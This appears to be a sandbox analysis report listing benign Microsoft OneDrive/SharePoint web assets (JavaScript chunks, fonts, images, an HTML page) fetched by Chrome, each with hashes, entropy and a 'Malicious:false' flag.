                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (855)
                                                  Category:downloaded
                                                  Size (bytes):1549
                                                  Entropy (8bit):5.41633423138362
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:99A3F6CE56A284A2A96A7A7FB5A38B71
                                                  SHA1:A10A513907EF8738BA7026F48EC97ED644BDBC71
                                                  SHA-256:922FDB0AA46C57FE49CC578DEA7796555BC1DF4068F91F2A5C81F6CD7DE1FE13
                                                  SHA-512:3446D30ABF7F3496CB4FABB26540124C1C9730C2B21BE81C28971F932042472D459A4F41C98FA5BC539807D270E9B6D2BD5A8BCD4F1BF739859D06A342F9C266
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/603.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[603],{6357:function(e,t,n){n.r(t),n.d(t,{Persona:function(){return a.a},PersonaBase:function(){return i.a},PersonaCoin:function(){return r.a},PersonaCoinBase:function(){return o.a},PersonaInitialsColor:function(){return s.a},PersonaPresence:function(){return s.b},PersonaSize:function(){return s.c},getPersonaInitialsColor:function(){return c.a},personaPresenceSize:function(){return d.a},personaSize:function(){return d.b},presenceBoolean:function(){return d.c},sizeBoolean:function(){return d.d},sizeToPixels:function(){return d.e}});var a=n(5945),i=n(5946),r=n(3301),o=n(3302),s=n(2841),c=n(2901),d=n(3005)}.,3006:function(e,t,n){n.d(t,{a:function(){return c}});var a=/[\(\[\{\<][^\)\]\}\>]*[\)\]\}\>]/g,i=/[\0-\u001F\!-/:-@\[-`\{-\u00BF\u0250-\u036F\uD800-\uFFFF]/g,r=/^\d+[\d\s]*(:?ext|x|)\s*\d+$/i,o=/\s+/g,s=/[\u0600-\u06FF\u0750-\u077F\u08A0-\u08FF\u1100-\u11FF\u3130-\u318F\uA960-\uA97F\uAC00-\uD7AF\uD7B0-\uD7FF\
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image
                                                  Category:downloaded
                                                  Size (bytes):34268
                                                  Entropy (8bit):7.950792855146962
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:1666AAC9E890DBFA52233EE9DBAC7016
                                                  SHA1:8CBF47E86BCF022D8675A0346EB429F12D9C8285
                                                  SHA-256:BFE9F48B1C1C0A4D93329F3399F4DE41AE5CA780CE4E5FCA7BE168CAFEE394E1
                                                  SHA-512:85B940782FD5607168AB3F41503708FFCA3CDCE1AB953D9F4692B4B15172D296E96598888F6A9F2E79E2C3052A68268C71B02036C05AED0FD6F3C9DAE01E5440
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/emptyfolder/empty_meeting_v3.webp
                                                  Preview:RIFF...WEBPVP8X..............ALPH._.....m.H....z.....~4.I.'6Y..W .nf...6.@.`..m.mK.T."*......LI.f..s.....=....(...*...o..Z{...;w..).....m.:In.....ipY..[hvb9f;..2.........ar$sHr.....PS...P.3..=....._.........._.....u..(.......M..6..%....\......3..%......`a]d..f...B...|...4Y..l..EZ....W.....f..W.E-4..].!..nZ.#kM.]Z.i.]Z.4.Y.F..dw...&.iM..5.vi.e....vm...VZ$.2.Lw...e.Y.i-.uY.fM.uY.LL...z0.M.&..f-#..,.e..5]..%..flfl.P.HZ44.7..3omh4.1..<l..mLFCk.o4Og...h.c..5.$.`3Nf.G.D.w ...`1]......z0zj.h.,.#..k]..tY7.J !/.....m...DPeQ.#....HI3cg{p.....m....].....s.......h>2.. ....}.'.......ab.."&@ED...Qi...............m,.'..t..............).....TP.(..n...z=.n.....o.yc..,....v..0..%=..D..lAPQA..Q.!.(f.,F.....2\Z...4.A..i...<..hZ..6Z...e..v?..m....2...P..A......d.4.\.b......k.t..#.di.=.M#.X7.2..H...U.lK......FDQ.A<"m.."..A..2..a-kbYnG.....F.6..Z.0a..Z&.#.e.!Iv..;....... ...@@...A.C...H.K5.%k..M.....9N..B[m.I.....]F...'.6.[.b..4Vg#.......2A'HB.N.4LD.|... . ..C
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (4724)
                                                  Category:downloaded
                                                  Size (bytes):22094
                                                  Entropy (8bit):5.3227367398434815
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:075B37BE4977EE8438ACC486755DE3C3
                                                  SHA1:5BFD91EE20706034399F7E6F0C23E736E4A2B42C
                                                  SHA-256:BDB8DA183E5008FE6672B1FC9B91F4D6A6E0FD00EFDF31A8C7FB588A34F7EF5E
                                                  SHA-512:45AD0F76064BFB4411429888F87359FB3ED8F8A5EF81BA0A342D49BA0B12FD298E47F71A3DB69E4EC60D8AE742DCE02CC6E5197636475D6DA8F2A61C93B09A45
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/235.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[235],{5876:function(e,t,n){n.d(t,{a:function(){return v},b:function(){return y}});var a=n("tslib_102"),i=n(5),r=n(114),o=n(63),s=n(4702),c=n(4712),d=n(4713),l=n(5864),u=n(4130),f=n(4644),p=n(895),m=n(101),_=n(4666),h=n(5877),b=n(349),g=n(4716);function v(e,t){var n=t.itemKey,v=t.desiredSize,S=t.fitMode,D=t.requestOptions,I=e.demandItemFacet(o.a,n);if(!I)return{};var C=e.demandItemFacet(l.a,n)?function(e,t){var n=t.itemKey,a=t.desiredSize,i=t.fitMode,r=y(e.demandItemFacet(s.a,n));if(r&&r.large){var o=e.demandItemFacet(u.a,n),c=o&&(o["@microsoft.graph.downloadUrl"]||o["@content.downloadUrl"]),d=(0,_.a)(e,{itemKey:n});return{url:x(d&&c||r.large.url,a,i,d),width:0,height:0}}}(e,{itemKey:n,driveItem:I,desiredSize:v,fitMode:S}):function(e,t){var n,o=t.itemKey,s=t.driveItem,l=t.desiredSize,u=!!e.demandItemFacet(i.q,o),_=!!e.demandItemFacet(r.e,o);if(!u&&!_){if(!(null===(n=t.requestOptions)||void 0===n?void 0:n.allow
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 15684, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):15684
                                                  Entropy (8bit):7.974866409378684
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:24C258ECCFD20FD3555F8453E85186F5
                                                  SHA1:4E75C8645A27E405B1AB24D792338E8C5E7F275D
                                                  SHA-256:BB7D87F5E6D6CDC14E181C73155A749185331D912290A284C7A3369BBD587670
                                                  SHA-512:5789F77F91A4B6555C8EA75119562BDF0CB884F5FBF84E8B22D6C785F13E85EF6CF8B2CE445C7D07BA355D502C05C4810B55C2FA389997D2365A06C60D1B82AE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-2-7b0250ce.woff
                                                  Preview:wOFF......=D......o4........................OS/2.......G...`,.d5cmap...P.........G..gasp................glyf......5...`.P...head..7....2...6#...hhea..80.......$....hmtx..8L...Z....%...loca..8.........wZ..maxp..9t....... .r..name..9........O..R.post..=0....... ....x.c`a..8...........L..t.!.I.(......@9......VP`pxr..5.0.B2..@x....\O.u.x.....AQ...9.,<.....!r......7`ioe%.......K.$......j...."..=)2.J.z..ng(.nu..=.U...G....F...0..k..ZK.Kg.z..E.....0uv...R.@|)IQ..IL.....G............/.?...BN...............x..|.`....V..-.%[.,K.}.|[..#v.;...q..'6$$."..M .H.4I)W. .....-y..b.<..}..+.ymS....B.....n.ofwe..P.&.......7..}..A.!....X.#..^3.5{57...n..y..6~.....S..!t._.C..h&.B.R..U.56.I..+.....l.k7..G2pu....h.@..bV+.V-.@m;.{..={>~...mP~..={....]m...N.82.........}i..v..#.X}.Ng..F..<k......H....Y..c.C..I=.|.{G..5.../....(.......v...6_....y..F..tD..N..R..0u.......^.........b..K X..O.>L...F..M8Te....%..B..._.[v.%...q....i.....=<..-.~..../qbl.t:...s.7.^s.....+'.....V..L.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (23464)
                                                  Category:downloaded
                                                  Size (bytes):103828
                                                  Entropy (8bit):5.432952367399931
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D343417CB411A9912C273D5593B729F8
                                                  SHA1:B7202C300587C7936417BF0CF12677B78166513F
                                                  SHA-256:5AE1857A28B4E3E5FA071630FC400B1E742E1FD62A3E52D91E5CAB7019B16495
                                                  SHA-512:C8B5AFA3FE3A85F869DA0618FB3BA9A08B0DE6AF05E6B33CA1770EE11E3AD9842661957B8D5420C9351FD642FFDC7B2DD587238B96384236D9D5CC35FED57B19
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/83453.js
                                                  Preview:/*! For license information please see 83453.js.LICENSE.txt */."use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[83453],{868698:(e,t,n)=>{n.d(t,{_:()=>o,a:()=>s});var a=n(408156);const i=a.createContext(void 0),r={},o=i.Provider,s=()=>a.useContext(i)?a.useContext(i):r}.,339721:(e,t,n)=>{n.d(t,{r:()=>k});var a=n(408156),i=n(755289),r=n(989714),o=n(927915),s=n(965109),c=n(329989);const d=a.createContext(void 0),l=d.Provider;var u=n(650039),f=n(527872),p=n(135007),m=n(517665),_=n(868698),h=n(508396),b=n(259948),g=n(142866),v=n(653350),y=n(320344),S=n(313858),D=n(950958),I=n(286581),x=n(671433);const C="fui-FluentProvider",O=(0,I.s)({root:{sj55zd:"f19n0e5",De3pzq:"fxugw4r",fsow6f:["f1o700av","fes3tcz"],Bahqtrf:"fk6fouc",Be2twd7:"fkhj508",Bhrd7zp:"figsok6",Bg96gwp:"f1i3iumi"}},{d:[".f19n0e5{color:var(--colorNeutralForeground1);}",".fxugw4r{background-color:var(--colorNeutralBackground1);}",".f1o700av{text-align:left;}",".fes3tcz{text-align:right
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:C source, ASCII text, with very long lines (11334)
                                                  Category:downloaded
                                                  Size (bytes):250555
                                                  Entropy (8bit):5.454828926981514
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:1361ABB8ED9EF9C515589C022D99064B
                                                  SHA1:D61E504CC49F835E94A6D077885BF47DC89E7660
                                                  SHA-256:DCD616F0610011B96F1096CFFBD96EB5F4D1D7CD734F75E63EEE5F1659656903
                                                  SHA-512:975687DFB6A6B8281D1713BF2BAB5AE493006FFCEDB7D9A2EA9545072D65A8C4AF34F743BDB3CE1E804B9A6072ACFAF8CB5176F7D8029B74817BE69D9C1D089E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/plt.listviewdataprefetch.js
                                                  Preview:var __webpack_result__;!function(){"use strict";var e={608:function(e,t,n){n.r(t),n.d(t,{__assign:function(){return a.W_},__asyncDelegator:function(){return a.nT},__asyncGenerator:function(){return a.Hq},__asyncValues:function(){return a.qA},__await:function(){return a.jr},__awaiter:function(){return a.Zd},__classPrivateFieldGet:function(){return a.nu},__classPrivateFieldSet:function(){return a.Cn},__createBinding:function(){return a.bg},__decorate:function(){return a.uh},__exportStar:function(){return a.m_},__extends:function(){return a.XJ},__generator:function(){return a.qr},__importDefault:function(){return a.D},__importStar:function(){return a.JV},__makeTemplateObject:function(){return a.hY},__metadata:function(){return a.ZX},__param:function(){return a.$T},__read:function(){return a.MS},__rest:function(){return a.l7},__spread:function(){return a.Te},__spreadArray:function(){return a.AE},__spreadArrays:function(){return a.CO},__values:function(){return a.OY}});var a=n("tslib_102")}
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image
                                                  Category:downloaded
                                                  Size (bytes):22510
                                                  Entropy (8bit):7.985564124193874
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:3121EB7B90AAFBD79004290988D25744
                                                  SHA1:5584F1BEB7B9E8CA11833035C9962B3DDD54F904
                                                  SHA-256:6DBE807B8DA91D549A49BEEC3330D795601EC0F272EA232E91121F3ED703DFE4
                                                  SHA-512:ED25BF0B7C12742A7B71BC271364970508FB03A5096F42EEDC360CE92205AF5BE0AC4EB0567585882D34629D179F9CAB287839247C81F61D894360A83B28AAA3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/emptyfolder/empty_files_v3.webp
                                                  Preview:RIFF.W..WEBPVP8X..............ALPHU1......$)J..C...,!....muO.o.1..PSJ).A....%9..!....m..@.I.....Np..3.5-.g.2p..m#5......D...B...W.].WI@S*I.T.z`.hj.H...F.m..$I..y...6.......{....`...H..("&..$.m...w..i......$E.D...............g.....1..33...J...D.).}..A...mC."...'.#.......O..FU=..].%3.....3....;.p|afffff>......M.E+iq..g.....v...Z....,.ED.x.TW.../......O.?......OO..Eg.n...):..d.........RW..............K.h...2-..K..Cgq.....\]...t..(......%...g=..8.b0..N..q. ..k...E.`..@HgM.Cf...+VBA&V.4.J.L.a..X...&B.O.1d.#...+....v.G........&".....e%.2{$2.B.7.QY.._.ngc.....K..D.M.(?j..P(..I....GIA..6 .......Q!..-..g.........=..z.hC.......p..e:Y]......6&1F.mL#e.F......P@.1...}......?2..[?>...8..Q...%#..d.....v.....\.A.....U`.0.....Q,&@n'....[..&dbQ...... ..!E...E......B.R.-b~....<'-.0T1| G.....1s9".0......,J..(...|z..._.k...F.3"..4$....\6_.....Q.x.&.h].3....j2...eV......;.|#.pc.1..$[.u.5....]..n.B!.....U+V.."....3UW...7..,.j.2....OGe.B .....N.....{.Z.+V.1.(.M..n...../.{
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (56859), with CRLF line terminators
                                                  Category:downloaded
                                                  Size (bytes):320214
                                                  Entropy (8bit):5.908313960779149
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:07C11DC6F731F2C8807360A53B20DFD5
                                                  SHA1:47F6EECD1FFDACEFDF44633AA9B6F8191000F952
                                                  SHA-256:2D9C71B83D6F90F777DDDD9FD4045EDE3ACFB7EE929BE3AEDAF74EBD3D20FB57
                                                  SHA-512:267DECCA023F0A17A9FCAD85F2AA7E7818DD44BA218E2B85590093D90919A8FC36D2A589C7167DB87C89EE67FE16E9F8F21450A11E321C122DF98A0ECB2D84D6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://hidrotehnik-my.sharepoint.com/personal/urska_zupanc-lasic_hidrotehnik_si/_layouts/15/onedrive.aspx?id=%2Fpersonal%2Furska%5Fzupanc%2Dlasic%5Fhidrotehnik%5Fsi%2FDocuments%2Fdobavitelji%2FPAYMENT&ga=1
                                                  Preview:..<!DOCTYPE html>..<html lang="en-us" dir="ltr">..<head><meta name="GENERATOR" content="Microsoft SharePoint" /><meta http-equiv="Content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="Expires" content="0" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no" /><title>...OneDrive..</title><link rel="shortcut icon" href="/_layouts/15/images/odbfavicon.ico?rev=47" type="image/vnd.microsoft.icon" id="favicon" /></head>.. <body style="margin: 0; padding: 0;">.. <script nonce= 'b626ba56-62c4-447d-b670-24ac4ba720d4' >if(!spfxPerfMarks){var spfxPerfMarks = {};} var markPerfStage=function(key) {if(window.performance && typeof window.performance.now === 'function'){spfxPerfMarks[key]=window.performance.now();} else{spfxPerfMarks[key]=Date.now();} if (window.performance && typeof window.performance.mark === 'function') {window.performance.mark(key);}};<
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (8307)
                                                  Category:dropped
                                                  Size (bytes):20364
                                                  Entropy (8bit):5.423389967758814
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D41445D0E06A4FF98A3B943DFD8B5853
                                                  SHA1:5CC7EE7096BE058304A56173B71DDECC74F74D41
                                                  SHA-256:576ADBAC03E265852746EC17B4A99FCC8F549C35CCCC9A012318D014D10C666E
                                                  SHA-512:1A303C32D0012F59D9ED2A177D29F7115E40C660B21FC4AD77B841CF4D7AE3D41B99E62AEA478998A4FD957D392C654D534B334378F4D9746F07C2C080B837FF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[142],{4847:function(e,t,n){n.d(t,{a:function(){return o}});var a=n("tslib_102"),i=n(888),r=n(131),o=function(e){function t(t){var n=e.call(this,{dataSourceName:"approvals"},{pageContext:t})||this;return n._apiUrlHelper=new r.a({webAbsoluteUrl:t.webAbsoluteUrl}),n}return(0,a.XJ)(t,e),t.prototype.enable=function(e,t,n){var a=this._apiUrlHelper.build().segment("SP.Approvals.Enable").toString();return this.dataRequestor.getData({url:a,method:"POST",qosName:"SPListApprovals.Enable",customerPromise:{pillar:"Edit",veto:function(e){return"Approvals: Enable approvals failure"}},additionalPostData:JSON.stringify({listId:e,addFieldsToDefaultView:t,extraViewToEnable:n})})},t.prototype.disable=function(e,t){var n=this._apiUrlHelper.build().segment("SP.Approvals.Disable").toString();return this.dataRequestor.getData({url:n,method:"POST",qosName:"SPListApprovals.Disable",customerPromise:{pillar:"Edit",veto:function(e){retur
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (7323)
                                                  Category:downloaded
                                                  Size (bytes):8114
                                                  Entropy (8bit):5.59795897537748
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:452D85428C4E4442685DF06B3815BD4C
                                                  SHA1:792029334B3088450AAC356FF9BE985D91EA6957
                                                  SHA-256:D3FF446956D1A2C8D3F0802B22B9710155A9E3B03D9725392F28882DBD49A3A7
                                                  SHA-512:52897A41028D2B5A825B77C463F786797A4174FC72C39034B4AFA8C3B395DE975C4EB1610553A3361E36D6915D4796AF2F7F0AAFC51DD463F79D7794F005444C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/14389.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[14389],{314389:(e,t,n)=>{n.d(t,{u:()=>A});var a=n(408156),i=n(667997),r=n(383651),o=n(62688),s=n(135007),c=n(329989),d=n(462312),l=n(289636),u=n(740830),f=n(500085),p=n(142866),m=n(950958),_=n(320344),h=n(313858),b=n(260524),g=n(938358),v=n(488610),y=n(455146),S=n(230985),D=n(755289),I=n(37318),x=n(989714),C=n(527872),O=n(369545),w=n(671433);const E=(0,O.s)({root:{mc9l5x:"fjseox",B7ck84d:"f1ewtqcl",B2u0y6b:"f132xexn",Bceei9c:"f158kwzp",Bahqtrf:"fk6fouc",Be2twd7:"fy9rknc",Bg96gwp:"fwrc4pm",Btd35i7:"fokg9q4",Beyfa6y:0,Bbmb7ep:0,Btl43ni:0,B7oj6ja:0,Dimara:"ft85np5",Bgfg5da:0,B9xav0g:0,oivjwe:0,Bn0qgzm:0,B4g9neb:0,zhjwy3:0,wvpqe5:0,ibv6hh:0,u1mtju:0,h3c5rm:0,vrafjx:0,Bekrc4i:0,i8vvqc:0,g2u3we:0,icvyot:0,B4j52fo:0,irswps:"f9ggezi",Byoj8tv:0,uwmqm3:0,z189sj:0,z8tnut:0,B0ocmuz:"f1bzqsji",De3pzq:"fxugw4r",sj55zd:"f19n0e5",Bhu2qc9:"fxeb0a7"},visible:{mc9l5x:"ftgm304"},inverted:{De3pzq:"fg3r6xk",sj55z
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 14892, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):14892
                                                  Entropy (8bit):7.972261281549256
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F1FAC5A482C90973AFF67CE299DF492D
                                                  SHA1:D73B4DAF2D687EEB31829C637461D4B34810BFED
                                                  SHA-256:E185DAE5382FA62FC872E77E270A22A97FE65F93FF511A8281860EEE574395EC
                                                  SHA-512:E26A3DFFBC32E0D96779F099A2B5710F31C581A13A065A9949006B03342B2C9CD389E1DE77B0FC8210553016CE01064633870C7E357F220AC659B93BBD511C86
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-11-d4e64b30.woff
                                                  Preview:wOFF......:,......l.........................OS/2.......G...`/.u.cmap...P...R...:...Ygasp................glyf......2=..\.F...head..4....6...6#.hhea..5(.......$....hmtx..5H...H.....t.hloca..5......... .$maxp..6\....... .q..name..6t.......O..R.post..:........ ....x.c`a..8...........L..t.!.I.(......@9......VP`px.....0.B2..@x....X9.Q.x...M(.a...g.&.........,..........J...P........dk.....B...2+..(q....I.q.z~..}~.O.....:.B.v./W.N..z.zO..0..c.9....Z6...6.E7..e7{....r...p.s..........0#.a....5ox.;.3.....W..RH.4I..E.D..Ji.5...o.dR..C.fh..N....f.O3.s.OCH3..2<h.....m... .8.1...m.....b......8.!.1.!.a...#..:_..n...8.1.Q.P.+z....@;.....#.uJ.eJ..(P...S.3..t..nA...|................x..|.|..wU....FsI3..Z...9.....H..[6.e..#[.......l...1....I.!.k.HB...`ID.$.|Y..Iv......~$..c.4.......#..VwWWwUW.z....z5.#O.b.C8@x".B..U....t..LY.=/...[8...W.5..L..I........\.....X...">.a.[8.O~.i..._.2B.3J#=.d...(...c.P....\[...!oSU./>.2.......;r.g...`.}N. ........^*b.e.d...)..y..m..`i.g.T.5W...}.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (58999)
                                                  Category:downloaded
                                                  Size (bytes):162635
                                                  Entropy (8bit):5.259132322965628
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:0EDAB728D8D71122C3CBE9741E7C5CE1
                                                  SHA1:1E33BC9331F063C489914D905D07D69FF90BF76D
                                                  SHA-256:638B8FF24C754AE805EB1820BD83A7718E98EC5E31BC962FDEE82240F337125F
                                                  SHA-512:E2D73BF0D71443001DC711B5ADBECCD120ED9959BFD882ECA06C0995D28C01FEA8125811371D9ADBC0950F132A421C3537E10810987A04AB51AAFA8156B1F6D7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/75224.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[75224],{157230:(e,t,n)=>{n.d(t,{P:()=>d});var a=n(230336),i=n(569494),r=n(408156),o=n.n(r),s=n(447111),c=n(332948),d=function(){function e(e,t,n,r,o){var s=this;this.htmlOverlay=t,this.onCanRender=r,this.classType=o,this.theme=i.C,this.showLoadingUi=!1,this.rendered=!1,this.componentsArray=[],this.childCoordinators=[],this.onUpdate=new a.y,this.idTracker=0,this.isNestedCoordinator=!1,this.update=function(e){s.onUpdate.notify(e)},this.render=function(e){if(!s.isNestedCoordinator){var t=s.htmlOverlay.getContainer(e);t&&s.renderInContainer(t,e)}};var c=!!e.getSetting("isCacheGetRendererInUiManagerEnabled","boolean");this.isUnsub1pObPropertiesEnabled=!!e.getSetting("isUnsub1pObPropertiesEnabled","boolean"),this.isRecapTargetDocumentFixEnabled=!!e.getSetting("isRecapTargetDocumentFixEnabled","boolean"),this.getRenderer=function(e,t){return c?(void 0===s.cachedRenderer&&(s.cachedRenderer=n(e,t)),s
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (36285)
                                                  Category:downloaded
                                                  Size (bytes):51484
                                                  Entropy (8bit):5.24918310485692
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:0296EFF7BD2E887CE7074FB031D9DDB4
                                                  SHA1:D7CB5EE1079B81E683D71A2A8DCF2489F5FE1199
                                                  SHA-256:C4EEF63ABB8A9C283D1FABEFB27B15253088D4751B35AD559551C5DD6D354FAB
                                                  SHA-512:BBC08162C4563A0048B711DC3B7E455ED6B79427C2318B26C95579A40BA9B618022B3361AE01DB114D421BAB1D1378C80580F1D2D30F7E000637EC474CD2117E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/305.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[305],{2483:function(e,t,n){n.d(t,{a:function(){return r}});var a=n("react-lib"),i=n(164);function r(e){var t=a.useState(e),n=t[0],r=t[1];return[n,{setTrue:(0,i.a)(function(){return function(){r(!0)}}),setFalse:(0,i.a)(function(){return function(){r(!1)}}),toggle:(0,i.a)(function(){return function(){r(function(e){return!e})}})}]}}.,2490:function(e,t,n){n.d(t,{a:function(){return c}});var a=n("react-lib"),i=n(2109),r=n("fui.core_351");const o=(0,r.xbz)({root:{mc9l5x:"f1w7gpdv",Bg96gwp:"fez10in",ycbfsm:"fg4l7m0"},rtl:{Bz10aip:"f13rod7r"}},{d:[".f1w7gpdv{display:inline;}",".fez10in{line-height:0;}",".f13rod7r{-webkit-transform:scaleX(-1);-moz-transform:scaleX(-1);-ms-transform:scaleX(-1);transform:scaleX(-1);}"],t:["@media (forced-colors: active){.fg4l7m0{forced-color-adjust:auto;}}"]}),s=(e,t)=>{const{title:n,primaryFill:a="currentColor",...s}=e,c={...s,title:void 0,fill:a},d=o(),l=(0,i.b)();return c.className=(
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:dropped
                                                  Size (bytes):990
                                                  Entropy (8bit):4.878057615238074
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:199626DC652C1654974D523091BDC7A4
                                                  SHA1:4F4724C50A31E020C935B09D0D00B33CAF7524D4
                                                  SHA-256:E477A44C29C0BE30EA8E5E8EDF66C9B50355EB05E3AC240767CD1209B3CC18C9
                                                  SHA-512:7578466025B976D65231A84F6E1A2832FC1B9627B17EC442B7C4E1BC79B4641FF95B24238A5092BEF3A5429550EB221D7E34E72347F590619F2757026533FD15
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<svg width="32" height="32" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M28 11H4V7.5c0-.275.225-.5.5-.5h23c.275 0 .5.225.5.5V11zm-.5 14h-23a.501.501 0 0 1-.5-.5V12h24v12.5c0 .275-.225.5-.5.5z" fill="#fff"/><path opacity=".67" fill-rule="evenodd" clip-rule="evenodd" d="M27.5 6h-23C3.673 6 3 6.673 3 7.5v17c0 .827.673 1.5 1.5 1.5h23c.827 0 1.5-.673 1.5-1.5v-17c0-.827-.673-1.5-1.5-1.5zm-23 1h23c.275 0 .5.225.5.5V11H4V7.5c0-.275.225-.5.5-.5zm0 18h23c.275 0 .5-.225.5-.5V12H4v12.5c0 .276.224.5.5.5z" fill="#605E5C"/><path d="M6 10a1 1 0 1 0 0-2 1 1 0 0 0 0 2zM9 10a1 1 0 1 0 0-2 1 1 0 0 0 0 2zM12 10a1 1 0 1 0 0-2 1 1 0 0 0 0 2z" fill="#C8C6C4"/><path clip-rule="evenodd" d="M16 22.5a4.5 4.5 0 1 0 0-9 4.5 4.5 0 0 0 0 9z" stroke="#69AFE5"/><path clip-rule="evenodd" d="M16 22.5c.828 0 1.5-2.015 1.5-4.5s-.672-4.5-1.5-4.5-1.5 2.015-1.5 4.5.672 4.5 1.5 4.5z" stroke="#69AFE5"/><path d="M12 17h8v-1h-8v1zm0 3h8v-1h-8v1z" fill="#69AFE5"/></svg>
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (36585)
                                                  Category:downloaded
                                                  Size (bytes):38785
                                                  Entropy (8bit):5.320850706436472
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FA0A1D5560D453DCB54B55414C382C63
                                                  SHA1:7D41262CA31129BC33DD1D394F41C22E299FB542
                                                  SHA-256:AA55A0D7E7066EDB8632031E4ACEC81282C1174BAF4B15A971DB446E0BF899A0
                                                  SHA-512:A11D037687C5BC45BF9B559771A06F1E089607EA844455C378D5B64EB38747CAE3E44B30D9F81211398FBD737592AC09E46E8AC36C3F254CA52DC0119C43579D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/243.js
